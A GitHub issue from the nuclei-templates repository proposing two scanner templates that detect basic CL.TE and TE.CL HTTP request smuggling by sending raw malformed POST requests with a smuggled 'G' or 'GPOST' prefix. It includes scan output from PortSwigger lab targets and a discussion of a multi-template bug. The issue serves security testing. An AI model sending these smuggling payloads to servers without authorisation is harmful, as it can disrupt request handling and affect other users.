search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9.31k stars 2.64k forks source link

Basic CL.TE & TE.CL HTTP request smuggling vulnerabilities #4087

Open akincibor opened 2 years ago

akincibor commented 2 years ago

CL.TE : 

id: CL-TE-http-smuggling

info:
  name: HTTP request smuggling, basic CL.TE vulnerability
  author: pdteam, akincibor
  severity: Low

requests:
  - raw:
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked

      0

      G
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked

      0

      G

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Unrecognized method GPOST")'

TE.CL : 

id: TE-CL-http-smuggling

info:
  name: HTTP request smuggling, basic TE.CL vulnerability
  author: pdteam, akincibor
  severity: Low

requests:
  - raw:
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded
      Content-length: 4
      Transfer-Encoding: chunked

      5c
      GPOST / HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 15

      x=1
      0
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded
      Content-length: 4
      Transfer-Encoding: chunked

      5c
      GPOST / HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 15

      x=1
      0

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Unrecognized method GPOST")'
alexanderkent commented 2 years ago

Thanks for sharing. Quickly tested this against the HTTP request smuggling Lab by Portswigger and they work if run as standalone e.g.

nuclei -u https://XXXXXXXXX.web-security-academy.net -t nuclei-templates/CL-TE-http-smuggling.yaml 

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.5 (latest)
[INF] Using Nuclei Templates 9.1.5 (latest)
[INF] Templates added in last update: 58
[INF] Templates loaded for scan: 1
[2022-08-13 08:01:12] [CL-TE-http-smuggling] [http] [low] https://XXXXXXXXX.web-security-

And the TE-CL one against the same target (as expected)

nuclei -u https://XXXXXXXXX.web-security-academy.net -t nuclei-templates/TE-CL-http-smuggling.yaml

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.5 (latest)
[INF] Using Nuclei Templates 9.1.5 (latest)
[INF] Templates added in last update: 58
[INF] Templates loaded for scan: 1
[INF] No results found. Better luck next time!

But trying both e.g. 2 templates:

nuclei -u https://XXXXXXXXX.web-security-academy.net -t nuclei-templates/                         

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.5 (latest)
[INF] Using Nuclei Templates 9.1.5 (latest)
[INF] Templates added in last update: 58
[INF] Templates loaded for scan: 2
[INF] No results found. Better luck next time!

Yields no results. I tried -c 1 concurrency etc but always yields no results when > 1 templates.

ehsandeep commented 2 years ago

@alexanderkent mentioned behavior should be fixed with the latest release - https://github.com/projectdiscovery/nuclei/releases/tag/v2.7.6